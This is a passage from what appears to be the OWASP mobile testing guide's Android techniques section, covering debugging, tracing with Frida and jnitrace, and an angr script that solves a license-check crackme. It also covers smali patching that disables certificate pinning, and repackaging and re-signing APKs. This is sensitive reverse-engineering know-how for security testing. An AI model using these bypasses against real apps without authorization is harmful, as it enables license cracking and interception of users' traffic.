; it only runs once, at startup. You can solve this problem by activating the \"Wait for Debugger\" option. Go to Developer Options -> Select debug app and pick HelloWorldJNI, then activate the Wait for debugger switch. Then terminate and re-launch the app. It should be suspended automatically.
Our objective is to set a breakpoint at the first instruction of the native function Java_sg_vantagepoint_helloworldjni_MainActivity_stringFromJNI
before resuming the app. Unfortunately, this isn't possible at this point in the execution because libnative-lib.so
isn't yet mapped into process memory, it's loaded dynamically during runtime. To get this working, you'll first use jdb to gently change the process into the desired state.
First, resume execution of the Java VM by attaching jdb. You don't want the process to resume immediately though, so pipe the suspend
command into jdb:
$ adb jdwp\n14342\n$ adb forward tcp:7777 jdwp:14342\n$ { echo \"suspend\"; cat; } | jdb -attach localhost:7777\n
Next, suspend the process where the Java runtime loads libnative-lib.so
. In jdb, set a breakpoint at the java.lang.System.loadLibrary
method and resume the process. After the breakpoint has been reached, execute the step up
command, which will resume the process until loadLibrary
returns. At this point, libnative-lib.so
has been loaded.
> stop in java.lang.System.loadLibrary\n> resume\nAll threads resumed.\nBreakpoint hit: \"thread=main\", java.lang.System.loadLibrary(), line=988 bci=0\n> step up\nmain[1] step up\n>\nStep completed: \"thread=main\", sg.vantagepoint.helloworldjni.MainActivity.<clinit>(), line=12 bci=5\n\nmain[1]\n
Execute gdbserver
to attach to the suspended app. This will cause the app to be suspended by both the Java VM and the Linux kernel (creating a state of \"double-suspension\").
$ adb forward tcp:1234 tcp:1234\n$ $TOOLCHAIN/arm-linux-androideabi-gdb libnative-lib.so\nGNU gdb (GDB) 7.7\nCopyright (C) 2014 Free Software Foundation, Inc.\n(...)\n(gdb) target remote :1234\nRemote debugging using :1234\n0xb6de83b8 in ?? ()\n
"},{"location":"MASTG/techniques/android/MASTG-TECH-0032/","title":"Execution Tracing","text":"Besides being useful for debugging, the jdb command line tool offers basic execution tracing functionality. To trace an app right from the start, you can pause the app with the Android \"Wait for Debugger\" feature or a kill -STOP
command and attach jdb to set a deferred method breakpoint on any initialization method. Once the breakpoint is reached, activate method tracing with the trace go methods
command and resume execution. jdb will dump all method entries and exits from that point onwards.
$ adb forward tcp:7777 jdwp:7288\n$ { echo \"suspend\"; cat; } | jdb -attach localhost:7777\nSet uncaught java.lang.Throwable\nSet deferred uncaught java.lang.Throwable\nInitializing jdb ...\n> All threads suspended.\n> stop in com.acme.bob.mobile.android.core.BobMobileApplication.<clinit>()\nDeferring breakpoint com.acme.bob.mobile.android.core.BobMobileApplication.<clinit>().\nIt will be set after the class is loaded.\n> resume\nAll threads resumed.M\nSet deferred breakpoint com.acme.bob.mobile.android.core.BobMobileApplication.<clinit>()\n\nBreakpoint hit: \"thread=main\", com.acme.bob.mobile.android.core.BobMobileApplication.<clinit>(), line=44 bci=0\nmain[1] trace go methods\nmain[1] resume\nMethod entered: All threads resumed.\n
The Dalvik Debug Monitor Server (DDMS) is a GUI tool included with Android Studio. It may not look like much, but its Java method tracer is one of the most awesome tools you can have in your arsenal, and it is indispensable for analyzing obfuscated bytecode.
DDMS is somewhat confusing, however; it can be launched several ways, and different trace viewers will be launched depending on how a method was traced. There's a standalone tool called \"Traceview\" as well as a built-in viewer in Android Studio, both of which offer different ways to navigate the trace. You'll usually use Android Studio's built-in viewer, which gives you a zoomable hierarchical timeline of all method calls. However, the standalone tool is also useful, as it has a profile panel that shows the time spent in each method along with the parents and children of each method.
To record an execution trace in Android Studio, open the Android tab at the bottom of the GUI. Select the target process in the list and click the little stop watch button on the left. This starts the recording. Once you're done, click the same button to stop the recording. The integrated trace view will open and show the recorded trace. You can scroll and zoom the timeline view with the mouse or trackpad.
Execution traces can also be recorded in the standalone Android Device Monitor. The Device Monitor can be started within Android Studio (Tools -> Android -> Android Device Monitor) or from the shell with the ddms
command.
To start recording tracing information, select the target process in the Devices tab and click Start Method Profiling. Click the stop button to stop recording, after which the Traceview tool will open and show the recorded trace. Clicking any of the methods in the profile panel highlights the selected method in the timeline panel.
DDMS also offers a convenient heap dump button that will dump the Java heap of a process to a .hprof file. The Android Studio user guide contains more information about Traceview.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0032/#tracing-system-calls","title":"Tracing System Calls","text":"Moving down a level in the OS hierarchy, you arrive at privileged functions that require the powers of the Linux kernel. These functions are available to normal processes via the system call interface. Instrumenting and intercepting calls into the kernel is an effective method for getting a rough idea of what a user process is doing, and often the most efficient way to deactivate low-level tampering defenses.
Strace is a standard Linux utility that is not included with Android by default, but can be easily built from source via the Android NDK. It monitors the interaction between processes and the kernel, being a very convenient way to monitor system calls. However, there's a downside: as strace depends on the ptrace
system call to attach to the target process, once anti-debugging measures become active it will stop working.
If the \"Wait for debugger\" feature in Settings > Developer options is unavailable, you can use a shell script to launch the process and immediately attach strace (not an elegant solution, but it works):
while true; do pid=$(pgrep 'target_process' | head -1); if [[ -n \"$pid\" ]]; then strace -s 2000 - e \"!read\" -ff -p \"$pid\"; break; fi; done\n
"},{"location":"MASTG/techniques/android/MASTG-TECH-0032/#ftrace","title":"Ftrace","text":"Ftrace is a tracing utility built directly into the Linux kernel. On a rooted device, ftrace can trace kernel system calls more transparently than strace can (strace relies on the ptrace system call to attach to the target process).
Conveniently, the stock Android kernel on both Lollipop and Marshmallow include ftrace functionality. The feature can be enabled with the following command:
echo 1 > /proc/sys/kernel/ftrace_enabled\n
The /sys/kernel/debug/tracing
directory holds all control and output files related to ftrace. The following files are found in this directory:
The KProbes interface provides an even more powerful way to instrument the kernel: it allows you to insert probes into (almost) arbitrary code addresses within kernel memory. KProbes inserts a breakpoint instruction at the specified address. Once the breakpoint is reached, control passes to the KProbes system, which then executes the user-defined handler function(s) and the original instruction. Besides being great for function tracing, KProbes can implement rootkit-like functionality, such as file hiding.
Jprobes and Kretprobes are other KProbes-based probe types that allow hooking of function entries and exits.
The stock Android kernel comes without loadable module support, which is a problem because Kprobes are usually deployed as kernel modules. The strict memory protection the Android kernel is compiled with is another issue because it prevents the patching of some parts of Kernel memory. Elfmaster's system call hooking method causes a Kernel panic on stock Lollipop and Marshmallow because the sys_call_table is non-writable. You can, however, use KProbes in a sandbox by compiling your own, more lenient Kernel (more on this later).
"},{"location":"MASTG/techniques/android/MASTG-TECH-0033/","title":"Method Tracing","text":"In contrast to method profiling, which tells you how frequently a method is being called, method tracing helps you to also determine its input and output values. This technique can prove to be very useful when dealing with applications that have a big codebase and/or are obfuscated.
If you prefer a GUI-based approach you can use tools such as RMS - Runtime Mobile Security which enables a more visual experience as well as include several convenience tracing options.
If you prefer the command line, Frida offers a useful syntax to query Java classes and methods as well as Java method tracing support for frida-trace via -j
(starting on frida-tools 8.0, Frida 12.10).
Java.enumerateMethods('*youtube*!on*')
uses globs to take all classes that include \"youtube\" as part of their name and enumerate all methods starting with \"on\".-j '*!*certificate*/isu'
triggers a case-insensitive query (i
), including method signatures (s
) and excluding system classes (u
).Refer to the Release Notes for Frida 12.10 for more details on this new feature. To learn more about all options for advanced usage, check the documentation on the official Frida website.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0034/","title":"Native Code Tracing","text":"Native methods tracing can be performed with relative ease compared to Java method tracing. frida-trace
is a CLI tool for dynamically tracing function calls. It makes tracing native functions trivial and can be very useful for collecting information about an application.
In order to use frida-trace
, a Frida server should be running on the device. An example for tracing libc's open
function using frida-trace
is demonstrated below, where -U
connects to the USB device and -i
specifies the function to be included in the trace.
frida-trace -U -i \"open\" com.android.chrome\n
Note how, by default, only the arguments passed to the function are shown, but not the return values. Under the hood, frida-trace
generates one little JavaScript handler file per matched function in the auto-generated __handlers__
folder, which Frida then injects into the process. You can edit these files for more advanced usage such as obtaining the return value of the functions, their input parameters, accessing the memory, etc. Check Frida's JavaScript API for more details.
In this case, the generated script which traces all calls to the open
function in libc.so
is located in __handlers__/libc.so/open.js
, it looks as follows:
{\n onEnter: function (log, args, state) {\n log('open(' +\n 'path=\"' + args[0].readUtf8String() + '\"' +\n ', oflag=' + args[1] +\n ')');\n },\n\n\n onLeave: function (log, retval, state) {\n log('\\t return: ' + retval); // edited\n }\n}\n
In the above script, onEnter
takes care of logging the calls to this function and its two input parameters in the right format. You can edit the onLeave
event to print the return values as shown above.
Note that because libc is a well-known library, Frida is able to derive the input parameters of its open
function and automatically log them correctly. But this won't be the case for other libraries or for Android Kotlin/Java code. In that case, you may want to obtain the signatures of the functions you're interested in by referring to Android Developers documentation or by reverse engineering the app first.
Another thing to notice in the output above is that it's colorized. An application can have multiple threads running, and each thread can call the open
function independently. By using such a color scheme, the output can be easily visually segregated for each thread.
frida-trace
is a very versatile tool and there are multiple configuration options available such as:
-I
and excluding -X
entire modules.-i \"Java_*\"
(note the use of a glob *
to match all possible functions starting with \"Java_\").-a \"libjpeg.so!0x4793c\"
.frida-trace -U -i \"Java_*\" com.android.chrome\n
Many binaries are stripped and don't have function name symbols available with them. In such cases, a function can be traced using its address as well.
frida-trace -p 1372 -a \"libjpeg.so!0x4793c\"\n
"},{"location":"MASTG/techniques/android/MASTG-TECH-0035/","title":"JNI Tracing","text":"As detailed in section Reviewing Disassembled Native Code, the first argument passed to every JNI function is a JNI interface pointer. This pointer contains a table of functions that allows native code to access the Android Runtime. Identifying calls to these functions can help with understanding library functionality, such as what strings are created or Java methods are called.
jnitrace is a Frida based tool similar to frida-trace which specifically targets the usage of Android's JNI API by native libraries, providing a convenient way to obtain JNI method traces including arguments and return values.
You can easily install it by running pip install jnitrace
and run it straight away as follows:
jnitrace -l libnative-lib.so sg.vantagepoint.helloworldjni\n
The -l
option can be provided multiple times to trace multiple libraries, or *
can be provided to trace all libraries. This, however, may provide a lot of output.
In the output you can see the trace of a call to NewStringUTF
made from the native code (its return value is then given back to Java code, see section \"Reviewing Disassembled Native Code\" for more details). Note how similarly to frida-trace, the output is colorized helping to visually distinguish the different threads.
When tracing JNI API calls you can see the thread ID at the top, followed by the JNI method call including the method name, the input arguments and the return value. In the case of a call to a Java method from native code, the Java method arguments will also be supplied. Finally jnitrace will attempt to use the Frida backtracing library to show where the JNI call was made from.
To learn more about all options for advanced usage, check the documentation on the jnitrace GitHub page.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0036/","title":"Emulation-based Analysis","text":"The Android emulator is based on QEMU, a generic and open source machine emulator. QEMU emulates a guest CPU by translating the guest instructions on-the-fly into instructions the host processor can understand. Each basic block of guest instructions is disassembled and translated into an intermediate representation called Tiny Code Generator (TCG). The TCG block is compiled into a block of host instructions, stored in a code cache, and executed. After execution of the basic block, QEMU repeats the process for the next block of guest instructions (or loads the already translated block from the cache). The whole process is called dynamic binary translation.
Because the Android emulator is a fork of QEMU, it comes with all QEMU features, including monitoring, debugging, and tracing facilities. QEMU-specific parameters can be passed to the emulator with the -qemu
command line flag. You can use QEMU's built-in tracing facilities to log executed instructions and virtual register values. Starting QEMU with the -d
command line flag will cause it to dump the blocks of guest code, micro operations, or host instructions being executed. With the in_asm
flag, QEMU logs all basic blocks of guest code as they enter QEMU's translation function. The following command logs all translated blocks to a file:
emulator -show-kernel -avd Nexus_4_API_19 -snapshot default-boot -no-snapshot-save -qemu -d in_asm,cpu 2>/tmp/qemu.log\n
Unfortunately, generating a complete guest instruction trace with QEMU is impossible because code blocks are written to the log only at the time they are translated, not when they're taken from the cache. For example, if a block is repeatedly executed in a loop, only the first iteration will be printed to the log. There's no way to disable TB caching in QEMU (besides hacking the source code). Nevertheless, the functionality is sufficient for basic tasks, such as reconstructing the disassembly of a natively executed cryptographic algorithm.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0037/","title":"Symbolic Execution","text":"Symbolic execution is a very useful technique to have in your toolbox, especially while dealing with problems where you need to find a correct input for reaching a certain block of code. In this section, we will solve a simple Android crackme by using the Angr binary analysis framework as our symbolic execution engine.
To demonstrate this technique we'll use a crackme called Android License Validator. The crackme consists of a single ELF executable file, which can be executed on any Android device by following the instructions below:
$ adb push validate /data/local/tmp\n[100%] /data/local/tmp/validate\n\n$ adb shell chmod 755 /data/local/tmp/validate\n\n$ adb shell /data/local/tmp/validate\nUsage: ./validate <serial>\n\n$ adb shell /data/local/tmp/validate 12345\nIncorrect serial (wrong format).\n
So far so good, but we know nothing about what a valid license key looks like. To get started, open the ELF executable in a disassembler such as iaito. The main function is located at offset 0x00001874
in the disassembly. It is important to note that this binary is PIE-enabled, and iaito chooses to load the binary at 0x0
as image base address.
The function names have been stripped from the binary, but luckily there are enough debugging strings to provide us a context to the code. Moving forward, we will start analyzing the binary from the entry function at offset 0x00001874
, and keep a note of all the information easily available to us. During this analysis, we will also try to identify the code regions which are suitable for symbolic execution.
strlen
is called at offset 0x000018a8
, and the returned value is compared to 0x10 at offset 0x000018b0
. Immediately after that, the input string is passed to a Base32 decoding function at offset 0x00001340
. This provides us with valuable information that the input license key is a Base32-encoded 16-character string (which totals 10 bytes in raw). The decoded input is then passed to the function at offset 0x00001760
, which validates the license key. The disassembly of this function is shown below.
We can now use this information about the expected input to further look into the validation function at 0x00001760
.
\u256d (fcn) fcn.00001760 268\n\u2502 fcn.00001760 (int32_t arg1);\n\u2502 ; var int32_t var_20h @ fp-0x20\n\u2502 ; var int32_t var_14h @ fp-0x14\n\u2502 ; var int32_t var_10h @ fp-0x10\n\u2502 ; arg int32_t arg1 @ r0\n\u2502 ; CALL XREF from fcn.00001760 (+0x1c4)\n\u2502 0x00001760 push {r4, fp, lr}\n\u2502 0x00001764 add fp, sp, 8\n\u2502 0x00001768 sub sp, sp, 0x1c\n\u2502 0x0000176c str r0, [var_20h] ; 0x20 ; \"$!\" ; arg1\n\u2502 0x00001770 ldr r3, [var_20h] ; 0x20 ; \"$!\" ; entry.preinit0\n\u2502 0x00001774 str r3, [var_10h] ; str.\n\u2502 ; 0x10\n\u2502 0x00001778 mov r3, 0\n\u2502 0x0000177c str r3, [var_14h] ; 0x14\n\u2502 \u256d\u2500< 0x00001780 b 0x17d0\n\u2502 \u2502 ; CODE XREF from fcn.00001760 (0x17d8)\n\u2502 \u256d\u2500\u2500> 0x00001784 ldr r3, [var_10h] ; str.\n\u2502 \u2502 ; 0x10 ; entry.preinit0\n\u2502 \u254e\u2502 0x00001788 ldrb r2, [r3]\n\u2502 \u254e\u2502 0x0000178c ldr r3, [var_10h] ; str.\n\u2502 \u254e\u2502 ; 0x10 ; entry.preinit0\n\u2502 \u254e\u2502 0x00001790 add r3, r3, 1\n\u2502 \u254e\u2502 0x00001794 ldrb r3, [r3]\n\u2502 \u254e\u2502 0x00001798 eor r3, r2, r3\n\u2502 \u254e\u2502 0x0000179c and r2, r3, 0xff\n\u2502 \u254e\u2502 0x000017a0 mvn r3, 0xf\n\u2502 \u254e\u2502 0x000017a4 ldr r1, [var_14h] ; 0x14 ; entry.preinit0\n\u2502 \u254e\u2502 0x000017a8 sub r0, fp, 0xc\n\u2502 \u254e\u2502 0x000017ac add r1, r0, r1\n\u2502 \u254e\u2502 0x000017b0 add r3, r1, r3\n\u2502 \u254e\u2502 0x000017b4 strb r2, [r3]\n\u2502 \u254e\u2502 0x000017b8 ldr r3, [var_10h] ; str.\n\u2502 \u254e\u2502 ; 0x10 ; entry.preinit0\n\u2502 \u254e\u2502 0x000017bc add r3, r3, 2 ; \"ELF\\x01\\x01\\x01\" ; aav.0x00000001\n\u2502 \u254e\u2502 0x000017c0 str r3, [var_10h] ; str.\n\u2502 \u254e\u2502 ; 0x10\n\u2502 \u254e\u2502 0x000017c4 ldr r3, [var_14h] ; 0x14 ; entry.preinit0\n\u2502 \u254e\u2502 0x000017c8 add r3, r3, 1\n\u2502 \u254e\u2502 0x000017cc str r3, [var_14h] ; 0x14\n\u2502 \u254e\u2502 ; CODE XREF from fcn.00001760 (0x1780)\n\u2502 
\u254e\u2570\u2500> 0x000017d0 ldr r3, [var_14h] ; 0x14 ; entry.preinit0\n\u2502 \u254e 0x000017d4 cmp r3, 4 ; aav.0x00000004 ; aav.0x00000001 ; aav.0x00000001\n\u2502 \u2570\u2500\u2500< 0x000017d8 ble 0x1784 ; likely\n\u2502 0x000017dc ldrb r4, [fp, -0x1c] ; \"4\"\n\u2502 0x000017e0 bl fcn.000016f0\n\u2502 0x000017e4 mov r3, r0\n\u2502 0x000017e8 cmp r4, r3\n\u2502 \u256d\u2500< 0x000017ec bne 0x1854 ; likely\n\u2502 \u2502 0x000017f0 ldrb r4, [fp, -0x1b]\n\u2502 \u2502 0x000017f4 bl fcn.0000170c\n\u2502 \u2502 0x000017f8 mov r3, r0\n\u2502 \u2502 0x000017fc cmp r4, r3\n\u2502 \u256d\u2500\u2500< 0x00001800 bne 0x1854 ; likely\n\u2502 \u2502\u2502 0x00001804 ldrb r4, [fp, -0x1a]\n\u2502 \u2502\u2502 0x00001808 bl fcn.000016f0\n\u2502 \u2502\u2502 0x0000180c mov r3, r0\n\u2502 \u2502\u2502 0x00001810 cmp r4, r3\n\u2502 \u256d\u2500\u2500\u2500< 0x00001814 bne 0x1854 ; likely\n\u2502 \u2502\u2502\u2502 0x00001818 ldrb r4, [fp, -0x19]\n\u2502 \u2502\u2502\u2502 0x0000181c bl fcn.00001728\n\u2502 \u2502\u2502\u2502 0x00001820 mov r3, r0\n\u2502 \u2502\u2502\u2502 0x00001824 cmp r4, r3\n\u2502 \u256d\u2500\u2500\u2500\u2500< 0x00001828 bne 0x1854 ; likely\n\u2502 \u2502\u2502\u2502\u2502 0x0000182c ldrb r4, [fp, -0x18]\n\u2502 \u2502\u2502\u2502\u2502 0x00001830 bl fcn.00001744\n\u2502 \u2502\u2502\u2502\u2502 0x00001834 mov r3, r0\n\u2502 \u2502\u2502\u2502\u2502 0x00001838 cmp r4, r3\n\u2502 \u256d\u2500\u2500\u2500\u2500\u2500< 0x0000183c bne 0x1854 ; likely\n\u2502 \u2502\u2502\u2502\u2502\u2502 0x00001840 ldr r3, [0x0000186c] ; [0x186c:4]=0x270 section..hash ; section..hash\n\u2502 \u2502\u2502\u2502\u2502\u2502 0x00001844 add r3, pc, r3 ; 0x1abc ; \"Product activation passed. Congratulations!\"\n\u2502 \u2502\u2502\u2502\u2502\u2502 0x00001848 mov r0, r3 ; 0x1abc ; \"Product activation passed. 
Congratulations!\" ;\n\u2502 \u2502\u2502\u2502\u2502\u2502 0x0000184c bl sym.imp.puts ; int puts(const char *s)\n\u2502 \u2502\u2502\u2502\u2502\u2502 ; int puts(\"Product activation passed. Congratulations!\")\n\u2502 \u256d\u2500\u2500\u2500\u2500\u2500\u2500< 0x00001850 b 0x1864\n\u2502 \u2502\u2502\u2502\u2502\u2502\u2502 ; CODE XREFS from fcn.00001760 (0x17ec, 0x1800, 0x1814, 0x1828, 0x183c)\n\u2502 \u2502\u2570\u2570\u2570\u2570\u2570\u2500> 0x00001854 ldr r3, aav.0x00000288 ; [0x1870:4]=0x288 aav.0x00000288\n\u2502 \u2502 0x00001858 add r3, pc, r3 ; 0x1ae8 ; \"Incorrect serial.\" ;\n\u2502 \u2502 0x0000185c mov r0, r3 ; 0x1ae8 ; \"Incorrect serial.\" ;\n\u2502 \u2502 0x00001860 bl sym.imp.puts ; int puts(const char *s)\n\u2502 \u2502 ; int puts(\"Incorrect serial.\")\n\u2502 \u2502 ; CODE XREF from fcn.00001760 (0x1850)\n\u2502 \u2570\u2500\u2500\u2500\u2500\u2500\u2500> 0x00001864 sub sp, fp, 8\n\u2570 0x00001868 pop {r4, fp, pc} ; entry.preinit0 ; entry.preinit0 ;\n
Discussing all the instructions in the function is beyond the scope of this chapter, instead we will discuss only the important points needed for the analysis. In the validation function, there is a loop present at 0x00001784
which performs a XOR operation at offset 0x00001798
. The loop is more clearly visible in the graph view below.
XOR is a very commonly used technique to encrypt information where obfuscation is the goal rather than security. XOR should not be used for any serious encryption, as it can be cracked using frequency analysis. Therefore, the mere presence of XOR encryption in such a validation logic always requires special attention and analysis.
Moving forward, at offset 0x000017dc
, the XOR decoded value obtained from above is being compared against the return value from a sub-function call at 0x000017e8
.
Clearly this function is not complex, and can be analyzed manually, but still remains a cumbersome task. Especially while working on a big code base, time can be a major constraint, and it is desirable to automate such analysis. Dynamic symbolic execution is helpful in exactly those situations. In the above crackme, the symbolic execution engine can determine the constraints on each byte of the input string by mapping a path between the first instruction of the license check (at 0x00001760
) and the code that prints the \"Product activation passed\" message (at 0x00001840
).
The constraints obtained from the above steps are passed to a solver engine, which finds an input that satisfies them - a valid license key.
You need to perform several steps to initialize Angr's symbolic execution engine:
Load the binary into a Project
, which is the starting point for any kind of analysis in Angr.
Pass the address from which the analysis should start. In this case, we will initialize the state with the first instruction of the serial validation function. This makes the problem significantly easier to solve because you avoid symbolically executing the Base32 implementation.
Pass the address of the code block that the analysis should reach. In this case, that's the offset 0x00001840
, where the code responsible for printing the \"Product activation passed\" message is located.
Also, specify the addresses that the analysis should not reach. In this case, the code block that prints the \"Incorrect serial\" message at 0x00001854
is not interesting.
Note that the Angr loader will load the PIE executable with a base address of 0x400000
, which needs to be added to the offsets from iaito before passing it to Angr.
The final solution script is presented below:
import angr # Version: 9.2.2\nimport base64\n\nload_options = {}\n\nb = angr.Project(\"./validate\", load_options = load_options)\n# The key validation function starts at 0x401760, so that's where we create the initial state.\n# This speeds things up a lot because we're bypassing the Base32-encoder.\n\noptions = {\n angr.options.SYMBOL_FILL_UNCONSTRAINED_MEMORY,\n angr.options.ZERO_FILL_UNCONSTRAINED_REGISTERS,\n}\n\nstate = b.factory.blank_state(addr=0x401760, add_options=options)\n\nsimgr = b.factory.simulation_manager(state)\nsimgr.explore(find=0x401840, avoid=0x401854)\n\n# 0x401840 = Product activation passed\n# 0x401854 = Incorrect serial\nfound = simgr.found[0]\n\n# Get the solution string from *(R11 - 0x20).\n\naddr = found.memory.load(found.regs.r11 - 0x20, 1, endness=\"Iend_LE\")\nconcrete_addr = found.solver.eval(addr)\nsolution = found.solver.eval(found.memory.load(concrete_addr,10), cast_to=bytes)\nprint(base64.b32encode(solution))\n
As discussed previously in the section \"Dynamic Binary Instrumentation\", the symbolic execution engine constructs a binary tree of the operations for the program input given and generates a mathematical equation for each possible path that might be taken. Internally, Angr explores all the paths between the two points specified by us, and passes the corresponding mathematical equations to the solver to return meaningful concrete results. We can access these solutions via simulation_manager.found
list, which contains all the possible paths explored by Angr which satisfies our specified search criteria.
Take a closer look at the latter part of the script where the final solution string is being retrieved. The address of the string is obtained from address r11 - 0x20
. This may appear magical at first, but a careful analysis of the function at 0x00001760
holds the clue, as it determines if the given input string is a valid license key or not. In the disassembly above, you can see how the input string to the function (in register R0) is stored into a local stack variable 0x0000176c str r0, [var_20h]
. Hence, we decided to use this value to retrieve the final solution in the script. Using found.solver.eval
you can ask the solver questions like \"given the output of this sequence of operations (the current state in found
), what must the input (at addr
) have been?\".
In ARMv7, R11 is called fp (frame pointer), therefore R11 - 0x20
is equivalent to fp-0x20
: var int32_t var_20h @ fp-0x20
Next, the endness
parameter in the script specifies that the data is stored in \"little-endian\" fashion, which is the case for almost all of the Android devices.
Also, it may appear as if the script is simply reading the solution string from the memory of the script. However, it's reading it from the symbolic memory. Neither the string nor the pointer to the string actually exist. The solver ensures that the solution it provides is the same as if the program would be executed to that point.
Running this script should return the following output:
$ python3 solve.py\nWARNING | ... | cle.loader | The main binary is a position-independent executable. It is being loaded with a base address of 0x400000.\n\nb'JACE6ACIARNAAIIA'\n
Now you can run the validate binary in your Android device to verify the solution as indicated here.
You may obtain different solutions using the script, as there are multiple valid license keys possible.
To conclude, learning symbolic execution might look a bit intimidating at first, as it requires deep understanding and extensive practice. However, the effort is justified considering the valuable time it can save in contrast to analyzing complex disassembled instructions manually. Typically you'd use hybrid techniques, as in the above example, where we performed manual analysis of the disassembled code to provide the correct criteria to the symbolic execution engine. Please refer to the iOS chapter for more examples on Angr usage.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0038/","title":"Patching","text":"Making small changes to the Android Manifest or bytecode is often the quickest way to fix small annoyances that prevent you from testing or reverse engineering an app. On Android, two issues in particular happen regularly:
android:debuggable
flag is not set to \"true\"
in the Android Manifest.In most cases, both issues can be fixed by making minor changes to the app (aka. patching) and then re-signing and repackaging it. Apps that run additional integrity checks beyond default Android code-signing are an exception. In those cases, you have to patch the additional checks as well.
The first step is unpacking and disassembling the APK with apktool
:
apktool d target_apk.apk\n
Note: To save time, you may use the flag --no-src
if you only want to unpack the APK but not disassemble the code. For example, when you only want to modify the Android Manifest and repack immediately.
Certificate pinning is an issue for security testers who want to intercept HTTPS communication for legitimate reasons. Patching bytecode to deactivate SSL pinning can help with this. To demonstrate bypassing certificate pinning, we'll walk through an implementation in an example application.
Once you've unpacked and disassembled the APK, it's time to find the certificate pinning checks in the Smali source code. Searching the code for keywords such as \"X509TrustManager\" should point you in the right direction.
In our example, a search for \"X509TrustManager\" returns one class that implements a custom TrustManager. The derived class implements the methods checkClientTrusted
, checkServerTrusted
, and getAcceptedIssuers
.
To bypass the pinning check, add the return-void
opcode to the first line of each method. This opcode causes the checks to return immediately. With this modification, no certificate checks are performed, and the application accepts all certificates.
.method public checkServerTrusted([LJava/security/cert/X509Certificate;Ljava/lang/String;)V\n .locals 3\n .param p1, \"chain\" # [Ljava/security/cert/X509Certificate;\n .param p2, \"authType\" # Ljava/lang/String;\n\n .prologue\n return-void # <-- OUR INSERTED OPCODE!\n .line 102\n iget-object v1, p0, Lasdf/t$a;->a:Ljava/util/ArrayList;\n\n invoke-virtual {v1}, Ljava/util/ArrayList;->iterator()Ljava/util/Iterator;\n\n move-result-object v1\n\n :goto_0\n invoke-interface {v1}, Ljava/util/Iterator;->hasNext()Z\n
This modification will break the APK signature, so you'll also have to re-sign the altered APK archive after repackaging it.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0038/#patching-example-making-an-app-debuggable","title":"Patching Example: Making an App Debuggable","text":"Every debugger-enabled process runs an extra thread for handling JDWP protocol packets. This thread is started only for apps that have the android:debuggable=\"true\"
flag set in their manifest file's <application>
element. This is the typical configuration of Android devices shipped to end users.
When reverse engineering apps, you'll often have access to the target app's release build only. Release builds aren't meant to be debugged, that's the purpose of debug builds. If the system property ro.debuggable
is set to \"0\", Android disallows both JDWP and native debugging of release builds. Although this is easy to bypass, you're still likely to encounter limitations, such as a lack of line breakpoints. Nevertheless, even an imperfect debugger is still an invaluable tool, being able to inspect the runtime state of a program makes understanding the program a lot easier.
To convert a release build into a debuggable build, you need to modify a flag in the Android Manifest file (AndroidManifest.xml). Once you've unpacked the app (e.g. apktool d --no-src UnCrackable-Level1.apk
) and decoded the Android Manifest, add android:debuggable=\"true\"
to it using a text editor:
<application android:allowBackup=\"true\" android:debuggable=\"true\" android:icon=\"@drawable/ic_launcher\" android:label=\"@string/app_name\" android:name=\"com.xxx.xxx.xxx\" android:theme=\"@style/AppTheme\">\n
Even if we haven't altered the source code, this modification also breaks the APK signature, so you'll also have to re-sign the altered APK archive.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0038/#patching-react-native-applications","title":"Patching React Native applications","text":"If the React Native framework has been used for developing then the main application code is located in the file assets/index.android.bundle
. This file contains the JavaScript code. Most of the time, the JavaScript code in this file is minified. By using the tool JStillery a human readable version of the file can be retrieved, allowing code analysis. The CLI version of JStillery or the local server should be preferred instead of using the online version as otherwise source code is sent and disclosed to a 3rd party.
The following approach can be used in order to patch the JavaScript file:
apktool
tool.assets/index.android.bundle
into a temporary file.JStillery
to beautify and deobfuscate the content of the temporary file.assets/index.android.bundle
file.apktool
tool and sign it before installing it on the target device/emulator.You can easily repackage an app by doing the following:
cd UnCrackable-Level1\napktool b\nzipalign -v 4 dist/UnCrackable-Level1.apk ../UnCrackable-Repackaged.apk\n
Note that the Android Studio build tools directory must be in the path. It is located at [SDK-Path]/build-tools/[version]
. The zipalign
and apksigner
tools are in this directory.
Before re-signing, you first need a code-signing certificate. If you have built a project in Android Studio before, the IDE has already created a debug keystore and certificate in $HOME/.android/debug.keystore
. The default password for this KeyStore is \"android\" and the key is called \"androiddebugkey\".
The standard Java distribution includes keytool
for managing KeyStores and certificates. You can create your own signing certificate and key, then add it to the debug KeyStore:
keytool -genkey -v -keystore ~/.android/debug.keystore -alias signkey -keyalg RSA -keysize 2048 -validity 20000\n
After the certificate is available, you can re-sign the APK with it. Be sure that apksigner
is in the path and that you run it from the folder where your repackaged APK is located.
apksigner sign --ks ~/.android/debug.keystore --ks-key-alias signkey UnCrackable-Repackaged.apk\n
Note: If you experience JRE compatibility issues with apksigner
, you can use jarsigner
instead. When you do this, zipalign
must be called after signing.
jarsigner -verbose -keystore ~/.android/debug.keystore ../UnCrackable-Repackaged.apk signkey\nzipalign -v 4 dist/UnCrackable-Level1.apk ../UnCrackable-Repackaged.apk\n
Now you may reinstall the app:
adb install UnCrackable-Repackaged.apk\n
"},{"location":"MASTG/techniques/android/MASTG-TECH-0040/","title":"Waiting for the Debugger","text":"The UnCrackable App for Android Level 1 is not stupid: it notices that it has been run in debuggable mode and reacts by shutting down. A modal dialog is shown immediately, and the crackme terminates once you tap \"OK\".
Fortunately, Android's \"Developer options\" contain the useful \"Wait for Debugger\" feature, which allows you to automatically suspend an app during startup until a JDWP debugger connects. With this feature, you can connect the debugger before the detection mechanism runs, and trace, debug, and deactivate that mechanism. It's really an unfair advantage, but, on the other hand, reverse engineers never play fair!
In the Developer options, pick Uncrackable1
as the debugging application and activate the \"Wait for Debugger\" switch.
Note: Even with ro.debuggable
set to \"1\" in default.prop
, an app won't show up in the \"debug app\" list unless the android:debuggable
flag is set to \"true\"
in the Android Manifest.
In the previous section we learned about patching application code to assist in our analysis, but this approach has several limitations. For instance, you'd like to log everything that's being sent over the network without having to perform a MITM attack. For this you'd have to patch all possible calls to the network APIs, which can quickly become impractical when dealing with large applications. In addition, the fact that patching is unique to each application can also be considered a shortcoming, as this code cannot be easily reused.
